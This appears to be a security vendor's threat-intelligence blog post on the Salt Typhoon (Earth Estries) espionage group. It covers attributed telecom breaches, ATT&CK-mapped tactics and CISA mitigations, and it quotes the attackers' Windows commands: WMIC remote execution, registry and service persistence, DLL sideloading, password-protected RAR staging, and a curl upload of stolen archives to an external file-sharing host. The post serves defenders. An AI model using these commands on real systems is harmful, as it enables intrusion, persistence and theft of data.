Salt Typhoon, also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, is a critical actor in the global cyber threat landscape. Renowned for its sophisticated cyber espionage campaigns, the group primarily targets the telecommunications, government, and technology sectors. Strongly linked to state-sponsored initiatives, particularly from China [1], Salt Typhoon’s operations go beyond intelligence gathering. By targeting critical infrastructure and key industries, the group advances geopolitical objectives, exerting strategic pressure on adversaries. This dual role of espionage and influence underscores its pivotal role in shaping international relations through digital means.
Among Salt Typhoon’s arsenal is the advanced "GhostSpider" backdoor malware, specifically engineered to infiltrate telecommunications networks [2]. This tool provides persistent access to compromised systems, enabling prolonged surveillance and data extraction. Such capabilities highlight not only the group's technical sophistication but also the potential risk it poses to global critical infrastructure.
In this blog, we’ll analyze Salt Typhoon’s tactics, techniques, and procedures (TTPs), explore its targeted industries, and examine the tools it employs. Through specific case studies and insights from cutting-edge cybersecurity research, we aim to empower defenders with actionable strategies to mitigate the threats posed by this advanced and persistent adversary.
Salt Typhoon is a prominent threat actor that has garnered significant attention in the cybersecurity community due to its sophisticated operations and strategic targeting. This group, which is believed to be state-sponsored by China, has been active since at least 2023, according to [3].
Salt Typhoon's operations are marked by the use of advanced malware and the exploitation of both known and zero-day vulnerabilities, showcasing the resources and expertise typically associated with nation-state actors. This group has demonstrated a consistent ability to exploit public-facing endpoints, targeting vulnerabilities that allow for initial access and long-term persistence.
Notably, the following CVEs have been exploited by Salt Typhoon in their campaigns:
In addition, the group's affiliation with China is further supported by the use of tools and techniques consistent with other known Chinese APT groups [4].
Since its inception, Salt Typhoon has demonstrated an evolution in both its technical capabilities and its targeting strategies [5]. Initially, the group focused on exploiting vulnerabilities in widely used software and systems to gain access to sensitive networks.
In recent years, Salt Typhoon has enhanced its arsenal with custom-developed malware, most notably the "GhostSpider" backdoor. This advanced tool enables persistent access to compromised systems, supporting long-term espionage operations targeting telecommunications networks worldwide, as detailed in [6]. The group's targeting has also evolved, with a notable shift towards more strategic targets that can yield high-value intelligence. This includes not only telecommunications but also government entities and technology firms, which are often at the forefront of innovation and possess critical data.
Salt Typhoon, a sophisticated threat actor, has been linked to several high-profile cyber incidents that have significantly impacted various sectors globally. This section provides some of the most notable attacks attributed to Salt Typhoon, highlighting their objectives, methodologies, and the resulting impacts.
In 2024, the Chinese state-sponsored hacking group Salt Typhoon launched a global campaign targeting telecommunications service providers. Utilizing their custom-developed backdoor malware, GhostSpider, the group gained persistent access to compromised systems, enabling prolonged espionage activities within critical telecommunications networks.
Notably, Salt Typhoon breached major U.S. broadband providers [7], including Verizon, AT&T, and Lumen Technologies, potentially exposing sensitive communications data, such as information from federal wiretapping systems [8], posing significant national security risks on government and corporate activities.
Their attack methods include exploiting vulnerabilities in public-facing endpoints such as VPNs, firewalls, and exchange servers to gain initial access [9]. They have also been observed using spear-phishing emails to deliver malware payloads. Once inside the network, they establish persistence using tools like the Demodex rootkit and the GhostSpider backdoor, which can load different modules based on the attackers' specific purposes.
Their operations are characterized by stealth and persistence, often remaining undetected for extended periods. The breaches resulted in significant data exposure, with potential implications for national security and corporate confidentiality.
In 2024, T-Mobile was among several major U.S. telecommunications providers targeted by a sophisticated cyber-espionage campaign attributed to the Chinese state-sponsored group known as Salt Typhoon [10].
The attackers exploited vulnerabilities in network infrastructure, particularly focusing on routers and switches, to gain unauthorized access [11]. Their objectives included intercepting private communications, accessing call records, and obtaining sensitive data related to law enforcement requests.
T-Mobile acknowledged detecting and mitigating these intrusion attempts, emphasizing that no significant customer data was compromised [12]. The company stated that its security measures effectively prevented the attackers from achieving their goals.
This incident underscores the persistent and evolving nature of cyber threats facing the telecommunications industry, highlighting the critical importance of robust security measures to protect network infrastructure and sensitive information
Salt Typhoon, a sophisticated threat actor, employs a range of tactics, techniques, and procedures (TTPs) that are mapped to the MITRE ATT&CK framework. This section provides a detailed analysis of these TTPs, offering insights into how Salt Typhoon executes its operations.
Each tactic is examined with its associated techniques, providing a comprehensive understanding of the threat actor's methodologies.
As mentioned earlier, initial access is primarily achieved by exploiting vulnerabilities in exposed public-facing endpoints, enabling the deployment of malicious payloads through known flaws in web servers and applications.
Here are the some of known vulnerabilities with CVE IDs that are known to be exploited by the Salt Typhoon group [6]:
|
Note that patches are already available for these vulnerabilities, some of which date back to 2021. This highlights the importance of timely adaptation in exposure management processes.
Salt Typhoon uses command and scripting interpreters to execute malicious scripts and commands on compromised systems. This technique is crucial for deploying additional payloads and maintaining control over infected hosts.
For instance, security researchers have identified a case where the group exploited vulnerable or misconfigured QConvergeConsole installations on a target server to gain system access [5]. The remote application agent installed on the server (located at c:\program files\qlogic corporation\nqagent\netqlremote.exe) was used for network discovery and to deploy Cobalt Strike on the compromised machine.
The following commands are written and executed by Salt Typhoon.
# Retrieves domain admin group details: C:\Windows\system32\cmd.exe /C net group "domain admins" /domain # Copies malicious payload to the target: # Extracts the payload on the target: C:\Windows\system32\cmd.exe /C expand -f:* \\{HostName}\c$\programdata\microsoft\drm\go4.cab \\{HostName}\c$\programdata\microsoft\drm # Execute malicious script remotely: |
In a separate case, the group exploited a vulnerability in Apache Tomcat 6, included with QConvergeConsole (c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe), to facilitate lateral movement and execute later-stage tools [5].
# Executes a batch script (182.bat) on a remote system using the WMIC C:\Windows\system32\cmd.exe /C wmic /node:172.16.xx.xx process call create "cmd.exe /c c:\ProgramData\Microsoft\DRM\182.bat" # Employs rar.exe to compress sensitive files, specifically PDFs, into an archive. By collecting files from the temp directory and compressing them into a single .rar archive with maximum compression, Salt Typhoon staged the data for exfiltration. C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf |
These actions demonstrate a structured approach to lateral movement and data staging, critical steps in their attack chain.
Here are the persistence techniques used by the Salt Typhoon.
To maintain persistence, Salt Typhoon modifies system processes or creates new ones that run malicious code. This ensures that their malware remains active even after system reboots.
For instance, Crowdoor backdoor malware used by Salt Typhoon establishes persistence through a combination of registry modifications and service creation. When no argument or argument "0" is passed during execution, Crowdoor adds an entry to the Windows registry Run key using commands like [5]:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v malicious-registry-name /t REG_SZ /d "C:\path\to\malicious-crowdoor.exe" /f |
Alternatively, it can create a new service with commands such as:
sc create Crowdoor binPath= "C:\path\to\malicious-crowdoor.exe" start= auto |
Both methods ensure the backdoor is executed automatically on system reboot.
For stealth, Crowdoor employs process injection to execute itself within the context of a legitimate process, such as msiexec.exe. When argument "1" is used, the malware invokes process injection, leveraging system calls like CreateRemoteThread or NtCreateThreadEx to inject malicious payloads into the memory space of msiexec.exe. This enables execution without leaving significant artifacts on the disk.
Crowdoor's main functions are controlled by additional arguments passed during execution [5]. For instance:
These techniques, combined with its ability to dynamically switch between different operational modes based on provided arguments, make Crowdoor a robust persistence tool.
For privilege escalation, Salt Typhoon utilizes a range of sophisticated methods to gain elevated access within compromised systems. Key tactics include [5]:
The group exploits vulnerabilities in external-facing services like Microsoft Exchange servers and QConvergeConsole installations. Exploited services are used to deploy tools such as Cobalt Strike and PsExec, providing initial access to high-privilege accounts or systems.
(For command examples, see the “Command and Scripting Interpreter” section of the blog).
Tools like TrillClient are employed to harvest sensitive credentials from browser caches and other storage areas. Extracted credentials are often used to impersonate privileged users, such as domain admins, facilitating further escalation.
The attackers use commands to create malicious services that execute payloads with elevated privileges. For example:
sc create VGAuthtools binpath= "Installutil[.]exe C:\ProgramData\VMware\vmvssrv.exe" start= auto |
This command launches a malicious loader that deploys high-privilege tools such as Cobalt Strike.
Salt Typhoon performed scheduled tasks by remotely creating scheduled tasks using tools like WMIC to execute commands or payloads with system-level privileges.
For instance, they used the following command:
wmic /node:<IP> /user:<domain>\<user> /password:***** process call create "schtasks /run /tn microsoft\sihost" |
It connects to a remote machine (/node:<IP>) using specified credentials (/user and /password) and creates a scheduled task named microsoft\sihost. This task is configured to execute with system-level privileges, allowing the attackers to run malicious payloads or commands seamlessly. By leveraging WMIC and scheduled tasks, Salt Typhoon could integrate malicious activities into routine system processes, making detection and analysis more challenging.
Salt Typhoon threat group employed several sophisticated techniques for defense evasion during their campaigns [5]:
They utilized DLL sideloading by exploiting legitimate processes like MsSecEs.exe to load malicious DLLs such as Zingdoor and Snappybee. This allowed them to evade detection by blending into normal system operations.
In addition, they implemented other alternative ways to load payloads, such as:
C:\\Windows\\system32\\cmd.exe /C sc create VMware binpath= \"rundll32.exe C:\\Progra~1\\VMware\\vmtools.dll,fjdpw03d\" start= auto displayname= \"VMware\" |
They used various encryption methods, including multi-layer XOR and Base64 encoding with custom alphabets, to hide the malicious payloads in tools like Cobalt Strike. This made static analysis by defenders more challenging.
Earth Estries (a.k.a Salt Typhoon) employs a sophisticated tactic of obfuscating files and removing indicators by frequently uninstalling older backdoor versions and replacing them with updated variants. This strategy falls under Indicator Removal from Tools, which aims to minimize the likelihood of detection and forensic analysis.
For example, tools such as Crowdoor and Cobalt Strike are periodically cleaned up and replaced, either through automated scripts or manual intervention.
By cycling through updated versions, Earth Estries reduces the digital footprint of its operations while adapting to changes in the target's defensive measures. This technique also helps the group evade behavioral detection systems that may rely on recognizing specific patterns or artifacts left by earlier tools. Through this method, Earth Estries maintains operational security and persistence, making it harder for defenders to attribute and neutralize their activities.
The threat actor uses remote services to move laterally within a network. By leveraging valid account credentials that they harvested during their presence within the compromised network, Salt Typhoon can access remote systems and spread their malware across the network, increasing their foothold and potential impact [13].
Salt Typhoon employed a new variant of the NinjaCopy tool to bypass security mechanisms and extract sensitive system files. NinjaCopy uses a low-level NTFS parser, bypassing Windows protections like the System Access Control List (SACL) and Discretionary Access Control Lists (DACLs), enabling the group to extract files such as the NTDS.dit and SYSTEM registry hives. These files contain critical data like hashed credentials, which are vital for further exploitation within the victim's environment.
This modified variant of NinjaCopy, based on an open-source NTFS parser by Velocidex, allows attackers to open read handles on protected NTFS volumes, enabling unauthorized access to files locked by the system or used exclusively by other processes. By targeting these files, Earth Estries extracted sensitive configuration and credential data from their victims.
The group organized their collected data into password-protected RAR archives before exfiltration. They used the following command to archive and secure sensitive files [5]:
rar a -m3 -inul -ed -r -s -hp{password} -ta{yyyymmdd} -n*.pdf -n*.ddf -x*"\{avoided path}\" {Collector Path}\out<n>.tmp \\{IP}\"{Target Path}" |
Salt Typhoon employed predefined passwords like:
takehaya |
These archives often contained documents, system logs, and sensitive browser data collected from user directories.
After data collection, Earth Estries exfiltrated the stolen archives via command-and-control (C2) channels, using tools like cURL to upload files to anonymized file-sharing services.
Commands for exfiltration included:
curl -F "file=@c:\windows\ime\out1.tmp" hxxps://api.anonfiles[.]com/upload |
These actions anonymized their operations, making detection and traceability challenging for defenders. Additionally, Earth Estries leveraged internal proxy servers to disguise outbound traffic, forwarding data from compromised machines to external C2 servers. This tactic ensured exfiltration efforts appeared as routine network activity within the victim's environment.
Salt Typhoon utilized advanced command-and-control techniques to obfuscate malicious activity. Notably, their backdoors, such as Zingdoor, were configured to route communication through internal proxy servers within the victim’s network. This method masked malicious traffic by blending it with legitimate internal communication, making detection significantly more challenging.
By leveraging the internal proxy infrastructure, Salt Typhoon redirected backdoor traffic to external command-and-control (C2) servers through multiple proxy layers. This approach not only concealed the true destination of the data but also reduced the likelihood of detection by anomaly-based monitoring systems or intrusion detection tools. Consequently, the attackers effectively evaded network security controls and prolonged their presence within the compromised environment.
The CISA, in collaboration with the FBI and the NSA, has issued guidance to mitigate cyber threats posed by Salt Typhoon, a state-sponsored actor affiliated with the People's Republic of China.
Key recommendations include:
Implement Out-of-Band Management: Utilize a physically separate management network to prevent unauthorized access and lateral movement within operational networks.
Strict Access Control Lists (ACLs): Adopt a default-deny ACL strategy to regulate inbound and outbound traffic, ensuring all denied traffic is logged for analysis.
Employ Strong Network Segmentation: Use router ACLs, stateful packet inspection, firewalls, and demilitarized zones (DMZs) to isolate different device groups and services, reducing the attack surface.
Isolate Externally Facing Services: Place services like DNS, web servers, and mail servers in a DMZ to separate them from internal networks and backend resources.
Apply Patches for Internet-Facing Systems: Prioritize updating critical vulnerabilities, especially in appliances frequently targeted by threat actors.
Plan for Technology Lifecycle: Establish end-of-life plans for technologies beyond the manufacturer's supported lifecycle to ensure systems remain secure.
Implement Phishing-Resistant MFA: Deploy MFA solutions that are resistant to phishing attacks to enhance account security and prevent unauthorized access.
Enable Comprehensive Logging: Ensure logging is active for application, access, and security events, and store logs centrally to facilitate monitoring and incident response.
Incorporate Security in Development: Encourage software manufacturers to embed security throughout the development lifecycle to strengthen the overall security posture of their products.
By implementing these strategies, organizations can bolster their defenses against sophisticated cyber threats like Salt Typhoon, safeguarding critical infrastructure and sensitive information.
Salt Typhoon serves as a stark reminder of the transformative nature of cyber warfare and the strategic imperatives it creates for both governments and industries. Its ability to exploit vulnerabilities, deploy advanced malware, and persist undetected in critical infrastructure highlights the widening asymmetry between attackers and defenders. As geopolitical rivalries increasingly manifest in cyberspace, organizations must recognize that cyber threats are not isolated incidents but components of broader strategic objectives. Addressing this challenge demands a paradigm shift—one that prioritizes continuous risk assessment, adaptive defense mechanisms, and coordinated responses across public and private sectors.
To outpace adversaries like Salt Typhoon, defenders must embrace a proactive and strategic posture. This includes prioritizing zero-trust architecture, embedding security into the technology lifecycle, and fostering real-time threat intelligence sharing. Governments and enterprises alike must transition from reactive to predictive models of cybersecurity, aligning resources to counter state-sponsored actors’ evolving tactics. By investing in resilience and innovation, the global community can not only neutralize immediate threats but also reinforce the security of critical systems, ensuring a robust defense against the sophisticated adversaries shaping the digital battleground.
[1] R. Forno, “Salt Typhoon: China’s Attack on US Telecommunications Networks,” The Diplomat, The Diplomat, Dec. 11, 2024. Available: https://thediplomat.com/2024/12/salt-typhoon-chinas-attack-on-us-telecommunications-networks/. [Accessed: Dec. 18, 2024]
[2] “Salt Typhoon Builds Out Malware Arsenal With GhostSpider,” Nov. 26, 2024. Available: https://www.darkreading.com/application-security/salt-typhoon-malware-arsenal-ghostspider. [Accessed: Dec. 18, 2024]
[3] “Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions,” Trend Micro, Nov. 25, 2024. Available: https://www.trendmicro.com/en_nl/research/24/k/earth-estries.html. [Accessed: Dec. 18, 2024]
[4] G. Baran, “Chinese APT Hackers Using Multiple Tools And Vulnerabilities To Attack Telecom Orgs,” Cyber Security News, Nov. 27, 2024. Available: https://cybersecuritynews.com/chinese-apt-attacking-telecoms/. [Accessed: Dec. 18, 2024]
[5] “Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations,” Trend Micro, Nov. 08, 2024. Available: https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html. [Accessed: Dec. 19, 2024]
[6] B. Toulas, “Salt Typhoon hackers backdoor telcos with new GhostSpider malware,” BleepingComputer, Nov. 25, 2024. Available: https://www.bleepingcomputer.com/news/security/salt-typhoon-hackers-backdoor-telcos-with-new-ghostspider-malware/. [Accessed: Dec. 19, 2024]
[7] J. Lyons, “Chinese cyberspies reportedly breached Verizon, AT&T, Lumen,” The Register, Oct. 07, 2024. Available: https://www.theregister.com/2024/10/07/verizon_att_lumen_salt_typhoon/. [Accessed: Dec. 19, 2024]
[8] “Website.” Available: https://www.wsj.com/tech/cybersecurity/u-s-wiretap-systems-targeted-in-china-linked-hack-327fc63b
[9] “Salt Typhoon unleashes ‘GhostSpider’ on telecoms,” Nov. 26, 2024. Available: https://fieldeffect.com/blog/salt-typhoon-unleashes-ghostspider-on-telecoms. [Accessed: Dec. 19, 2024]
[10] S. Wheelston, “Chinese hacking group targets telecom networks,” DMNews, Dec. 05, 2024. Available: https://www.dmnews.com/chinese-hacking-group-targets-telecom-networks/. [Accessed: Dec. 19, 2024]
[11] S. Gatlan, “Chinese hackers breached T-Mobile’s routers to scope out network,” BleepingComputer, Nov. 27, 2024. Available: https://www.bleepingcomputer.com/news/security/chinese-hackers-breached-t-mobiles-routers-to-scope-out-network/. [Accessed: Dec. 19, 2024]
[12] “An Update on Recent Cyberattacks Targeting the US Wireless Companies,” T-Mobile Newsroom. Available: https://www.t-mobile.com/news/un-carrier/update-cyberattacks-targeting-us-wireless-companies. [Accessed: Dec. 19, 2024]
[13] “Earth Estries Targets Government, Tech for Cyberespionage,” Trend Micro, Aug. 30, 2023. Available: https://www.trendmicro.com/en_in/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html. [Accessed: Dec. 19, 2024]